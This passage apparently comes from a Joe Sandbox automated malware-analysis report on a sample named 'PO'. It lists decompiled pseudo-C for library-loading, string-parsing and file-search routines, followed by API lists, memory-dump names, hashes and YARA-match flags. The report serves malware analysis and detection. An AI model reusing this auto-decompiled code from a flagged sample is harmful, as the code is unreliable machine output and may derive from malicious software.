								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}

0x10001b20
0x10001b23
0x10001b26
0x10001b29
0x10001b2c
0x10001b2f
0x10001b32
0x10001b34
0x10001b37
0x10001b3c
0x10001b3f
0x10001b47
0x10001b4f
0x10001b51
0x10001b54
0x10001b5c
0x10001b5c
0x10001b61
0x10001b64
0x00000000
0x00000000
0x10001b6e
0x10001b71
0x10001b76
0x10001b78
0x10001beb
0x10001beb
0x10001beb
0x10001bef
0x10001bf2
0x10001bf4
0x10001c16
0x10001c18
0x10001c1b
0x10001c2a
0x10001c2c
0x10001c32
0x10001c32
0x10001c38
0x10001c3b
0x10001c3b
0x10001c3e
0x10001c3e
0x10001c44
0x10001c46
0x10001c46
0x10001c48
0x10001c4b
0x10001c4e
0x10001c54
0x10001c5a
0x10001c5d
0x10001c81
0x10001c84
0x00000000
0x00000000
0x10001c87
0x10001c89
0x10001c97
0x10001c9a
0x10001c9c
0x00000000
0x00000000
0x00000000
0x00000000
0x10001c9e
0x10001c9e
0x10001c9e
0x10001ca4
0x10001ca6
0x00000000
0x00000000
0x10001ca8
0x10001caa
0x10001cac
0x10001cae
0x00000000
0x00000000
0x00000000
0x10001cae
0x10001cb0
0x10001cb2
0x10001cb4
0x10001cb4
0x10001cba
0x10001cc0
0x10001cc2
0x10001cd6
0x10001cd6
0x10001cd8
0x10001cc4
0x10001cca
0x10001ccd
0x10001ccd
0x00000000
0x10001c5f
0x10001c5f
0x10001c5f
0x10001c60
0x10001c68
0x10001c6c
0x10001c72
0x10001c76
0x10001cde
0x10001ce1
0x10001ce5
0x10001d70
0x10001d74
0x10001b59
0x00000000
0x10001b59
0x00000000
0x10001d74
0x10001c62
0x10001c62
0x10001c63
0x00000000
0x00000000
0x10001c65
0x10001c66
0x00000000
0x00000000
0x00000000
0x10001c66
0x10001c5d
0x10001bf7
0x00000000
0x00000000
0x10001c00
0x10001c03
0x10001c10
0x10001c10
0x10001c05
0x00000000
0x10001c05
0x10001b7a
0x10001b7d
0x10001bce
0x10001bd1
0x10001be3
0x10001be3
0x10001be6
0x00000000
0x10001be6
0x10001bd3
0x10001bd8
0x00000000
0x00000000
0x10001bda
0x10001bdd
0x10001ced
0x10001cf0
0x10001cf0
0x10001cf2
0x10002048
0x1000204b
0x100020b2
0x10001d60
0x10001d63
0x10001d66
0x10001d69
0x10001d69
0x10001d6b
0x10001d6c
0x10001d6c
0x10001d6d
0x00000000
0x10001d6d
0x1000204d
0x10002050
0x10002057
0x10002057
0x1000205b
0x1000206f
0x1000206f
0x10002072
0x10002076
0x100020be
0x100020c1
0x100020c5
0x00000000
0x100020c5
0x10002078
0x1000207c
0x00000000
0x00000000
0x1000207e
0x10002085
0x10002085
0x1000208b
0x1000208e
0x100020aa
0x10002090
0x10002099
0x1000209c
0x1000209c
0x00000000
0x1000208e
0x1000205d
0x10002060
0x10002064
0x00000000
0x00000000
0x10002066
0x00000000
0x10002066
0x10002052
0x10002055
0x00000000
0x00000000
0x00000000
0x10002055
0x10001cf8
0x10001cf8
0x10001cf9
0x10001e29
0x10001e29
0x10001e2e
0x10001e31
0x00000000
0x00000000
0x10001e3e
0x00000000
0x10001fe5
0x10001fe8
0x10001feb
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x10001ff8
0x10001ff8
0x10001ffc
0x10002014
0x10002017
0x10002021
0x00000000
0x10002021
0x10001ffe
0x10001ffe
0x10002001
0x00000000
0x00000000
0x10002003
0x10002006
0x10002008
0x10002009
0x10002009
0x10002009
0x1000200a
0x1000200d
0x10002010
0x10002011
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x00000000
0x10001ff6
0x00000000
0x10001e85
0x00000000
0x00000000
0x10001e91
0x00000000
0x00000000
0x10001e78
0x10001e7c
0x10001e80
0x00000000
0x00000000
0x10001fb6
0x10001fba
0x00000000
0x00000000
0x10001fc0
0x10001fc9
0x10001fd0
0x10001fd8
0x00000000
0x00000000
0x10001f53
0x10001f53
0x00000000
0x00000000
0x10001e9a
0x00000000
0x00000000
0x10002040
0x00000000
0x00000000
0x10002030
0x00000000
0x00000000
0x10002034
0x00000000
0x00000000
0x1000203c
0x00000000
0x00000000
0x10001f76
0x00000000
0x00000000
0x10001f5b
0x10001f5d
0x00000000
0x00000000
0x10001f7e
0x00000000
0x00000000
0x10001f63
0x00000000
0x00000000
0x10001f67
0x00000000
0x00000000
0x10002038
0x10002042
0x10002042
0x00000000
0x00000000
0x10001f86
0x10001f8a
0x10001f8f
0x10001f92
0x10001f93
0x10001f96
0x10001f9c
0x10001f9c
0x00000000
0x00000000
0x10002028
0x00000000
0x00000000
0x10001f6b
0x10001f6e
0x10001f70
0x00000000
0x00000000
0x10001ea1
0x10001ea1
0x00000000
0x00000000
0x10001f7a
0x10001f80
0x10001f80
0x10001ea3
0x10001ea3
0x10001ea6
0x10001ead
0x10001eb0
0x10001eb2
0x10001eb4
0x10001eb5
0x10001eb9
0x10001ebc
0x10001ec2
0x10001ec8
0x10001ec8
0x10001eca
0x10001eca
0x10001ecd
0x10001ed3
0x10001ed5
0x10001ed9
0x10001ede
0x10001ede
0x10001ee0
0x10001ee0
0x10001ee3
0x10001ee6
0x10001eef
0x10001ef5
0x10001ef8
0x10001ef8
0x10001efa
0x10001efd
0x10001f03
0x00000000
0x10001f03
0x10001ec4
0x10001ec6
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e45
0x10001e4b
0x10001e4e
0x10001e50
0x10001e50
0x10001e53
0x10001e57
0x10001e64
0x10001e66
0x10001e6c
0x10001e6c
0x10001e6c
0x00000000
0x00000000
0x10001fa4
0x10001fa8
0x10001fad
0x10001fb0
0x10001f09
0x10001f09
0x10001f0b
0x00000000
0x00000000
0x10001f11
0x10001f11
0x10001f15
0x10001f1c
0x10001f40
0x10001f40
0x10001f44
0x10001f46
0x10001f49
0x10001f49
0x10001f4c
0x10001f4c
0x00000000
0x10001f44
0x10001f21
0x10001f24
0x10001f24
0x10001f2b
0x10001f2d
0x10001f30
0x10001f37
0x10001f38
0x10001f3e
0x10001f3e
0x00000000
0x10001f3e
0x10001f32
0x10001f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e3e
0x10001cff
0x10001cff
0x10001d00
0x10001e26
0x00000000
0x10001e26
0x10001d06
0x10001d07
0x00000000
0x00000000
0x10001d0f
0x10001d0f
0x10001d12
0x10001d5d
0x00000000
0x10001d5d
0x10001d14
0x10001d14
0x10001d17
0x10001d41
0x10001d44
0x10001d47
0x10001e18
0x10001e18
0x10001e18
0x10001d4d
0x10001d4d
0x10001d4d
0x10001e1e
0x00000000
0x10001e1e
0x10001d1a
0x10001d1a
0x10001d1b
0x10001d3e
0x10001d40
0x10001d40
0x00000000
0x10001d40
0x10001d1d
0x10001d1d
0x10001d20
0x10001d3a
0x00000000
0x10001d3a
0x10001d22
0x10001d22
0x10001d25
0x10001d36
0x00000000
0x10001d36
0x10001d27
0x10001d27
0x10001d28
0x10001d32
0x00000000
0x10001d32
0x10001d2b
0x10001d2c
0x00000000
0x00000000
0x10001d2e
0x00000000
0x10001d2e
0x00000000
0x10001bdd
0x10001b7f
0x10001b82
0x10001bb1
0x10001bb5
0x10001bbc
0x10001bc3
0x10001bc6
0x10001bc9
0x00000000
0x10001bc9
0x10001b84
0x10001b85
0x10001ba0
0x10001ba7
0x10001baa
0x00000000
0x10001baa
0x10001b8a
0x00000000
0x10001b90
0x10001b90
0x10001b97
0x00000000
0x10001b97
0x10001b8a
0x10001d83
0x10001d88
0x10001d8d
0x10001d91
0x100021c5
0x100021cb
0x10001da3
0x10001da5
0x10001da6
0x100020ee
0x100020ee
0x100020f1
0x100020f4
0x10002111
0x10002117
0x10002119
0x1000211f
0x10002136
0x10002136
0x10002136
0x10002143
0x10002149
0x1000214c
0x10002152
0x10002154
0x10002158
0x1000215a
0x10002161
0x10002166
0x10002169
0x1000216b
0x10002170
0x10002182
0x10002182
0x10002170
0x10002169
0x10002158
0x10002188
0x1000218b
0x10002195
0x1000219d
0x100021aa
0x100021b0
0x100021b3
0x100020e3
0x100020e3
0x00000000
0x100020e3
0x100021b9
0x100021bf
0x100021bf
0x00000000
0x00000000
0x100021c1
0x100021c1
0x100021c1
0x100021c1
0x00000000
0x1000218d
0x1000218d
0x10002193
0x00000000
0x00000000
0x00000000
0x10002193
0x1000218b
0x10002122
0x10002128
0x1000212a
0x10002130
0x00000000
0x00000000
0x00000000
0x10002130
0x100020f6
0x100020fd
0x10002103
0x10002109
0x00000000
0x10002109
0x10001dac
0x10001dad
0x100020cd
0x100020cd
0x100020d3
0x100020d6
0x00000000
0x00000000
0x100020dd
0x100020e2
0x00000000
0x100020e2
0x10001db4
0x00000000
0x00000000
0x10001dba
0x10001dba
0x10001dc3
0x10001dc8
0x10001dce
0x00000000
0x00000000
0x10001dd4
0x10001de1
0x10001de7
0x10001df1
0x10001df7
0x10001dff
0x10001e0f
0x00000000
0x10001e0f

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000001.00000002.85191842667.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.85191813710.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191874016.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.85191898523.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_PO.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 032C5559 Relevance: 3.4, Strings: 2, Instructions: 912COMMON

Download Yara Rule

Strings

", xrefs: 032C5D6B
1+S, xrefs: 032C5F83

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: 1+S$"
API String ID: 2706961497-268909483
Opcode ID: 496233f735d45257ba97fa79f0c71215dcc87036c97f7d501ca5111123df0f9b
Instruction ID: 3d0a06c9526f01e8645b538b68a0e3ce3c82c79c1a721ca6d476bb19014c0e23
Opcode Fuzzy Hash: 496233f735d45257ba97fa79f0c71215dcc87036c97f7d501ca5111123df0f9b
Instruction Fuzzy Hash: 606258346143868FDB21CF7889A83DA7BE16F17360F5982AECCD58F296D3718586C712

Uniqueness

Uniqueness Score: -1.00%

Function 004027FB Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004027FB(short __ebx, short* __esi) {
				void* _t21;

				if(FindFirstFileW(E00402BBF(2), _t21 - 0x2b0) != 0xffffffff) {
					E004060C5( *((intOrPtr*)(_t21 - 0x10)), _t8);
					_push(_t21 - 0x284);
					_push(__esi);
					E0040617E();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0x10)))) = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402813
0x0040282e
0x00402839
0x0040283a
0x00402970
0x00402815
0x00402818
0x0040281b
0x0040281e
0x0040281e
0x00402a4f
0x00402a5b

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 697524d3f53bd4141666a7acbda8ce38f50fd87c4c23088896125ab23c91ff0b
Instruction ID: ca82d2f7608ddbe9a9db451b4e667c54ef54e9945bbc135f2cbc761c4928cd6d
Opcode Fuzzy Hash: 697524d3f53bd4141666a7acbda8ce38f50fd87c4c23088896125ab23c91ff0b
Instruction Fuzzy Hash: 3CF08275600114DBC711EBE4DD49AAEB374FF00324F2045BBE105F31E1D7B499559B2A

Uniqueness

Uniqueness Score: -1.00%

Function 032A0A26 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

?J b, xrefs: 032A0A26

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID:
String ID: ?J b
API String ID: 0-3258522411
Opcode ID: 81cc29c9fd2fa53560255bea8bf15e5a74989a9805d763291b45c2aa2ba66fd3
Instruction ID: fd1842a6a16e050616023abb713b79809e9fe404d47ecebb57390b05063eeafe
Opcode Fuzzy Hash: 81cc29c9fd2fa53560255bea8bf15e5a74989a9805d763291b45c2aa2ba66fd3
Instruction Fuzzy Hash: 19410102E3EF06DBD252A0BC8AA93E36195CF17391F52CB1B8D67335917A8A06CD04C6

Uniqueness

Uniqueness Score: -1.00%

Function 032A7F4C Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d82c5eb97f1d08d71e6ea30af07abe36c85db7820e8aca1e6ff4ea15b350aa5a
Instruction ID: 172f954018f7834974137f83da204e47eb833c91fdb6b31fca003851012440fa
Opcode Fuzzy Hash: d82c5eb97f1d08d71e6ea30af07abe36c85db7820e8aca1e6ff4ea15b350aa5a
Instruction Fuzzy Hash: 61C1017264438A9BDB349F2989A13DB77B3EF65340FD1542DCC898B218EB7099C6C742

Uniqueness

Uniqueness Score: -1.00%

Function 032A6243 Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d5971ff49619d39e7e486eb57fcb5141c7dd2ee30a049dbddfc67a7f38429c9
Instruction ID: 9c1188411cf0f4380b733f392e21ae0966618411a332d8972e82b9ce12772c98
Opcode Fuzzy Hash: 1d5971ff49619d39e7e486eb57fcb5141c7dd2ee30a049dbddfc67a7f38429c9
Instruction Fuzzy Hash: 6FD1367560078B8FDB34DE28CDA93DA37B2EF66390F49412ECC898B546E7315A46CB41

Uniqueness

Uniqueness Score: -1.00%

Function 032A6313 Relevance: .3, Instructions: 319COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cb719d746ad6837937d66cfd989d49f3b041f4eb165b317532613a027958e66
Instruction ID: 30ca34ea199a8dd71fdf17b32cbd7f20ff8e3f598f490321bf35426477b10979
Opcode Fuzzy Hash: 8cb719d746ad6837937d66cfd989d49f3b041f4eb165b317532613a027958e66
Instruction Fuzzy Hash: 5FB1A03224078B8ACB319F2ECA553D67B73EF62394FC56169CC984E11AEB7119C78706

Uniqueness

Uniqueness Score: -1.00%

Function 032A7F0D Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9840bad2ba8ed4943bcc337be9cd2dca03e9d9790c6e7c08996fbb0ec8d76234
Instruction ID: a6e27699d72cdf65564a9edf7b9f0f1df1c9eaaf7664c46b608639070b5d67fe
Opcode Fuzzy Hash: 9840bad2ba8ed4943bcc337be9cd2dca03e9d9790c6e7c08996fbb0ec8d76234
Instruction Fuzzy Hash: C0B1597260434A9FDF34AE358CA57EF72B6EF94390F95842DDC4ACB204D3348985CA42

Uniqueness

Uniqueness Score: -1.00%

Function 032A802A Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.85191335084.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_32a0000_PO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 443fa3608eae95ddf016b41347004129930b1e48a7f2a5653a46b14650a97037
Instruction ID: ee616426f7d1bda3e269cb7c4dc0c0ff2b3013a743f9688b51fc31fcb0a27b65
Opcode Fuzzy Hash: 443fa3608eae95ddf016b41347004129930b1e48a7f2a5653a46b14650a97037
Instruction Fuzzy Hash: 78A1237261434A9FDF34AE388CA57EF76B2EF98390F95442DDC4ACB204D3348AC58A51

Uniqueness

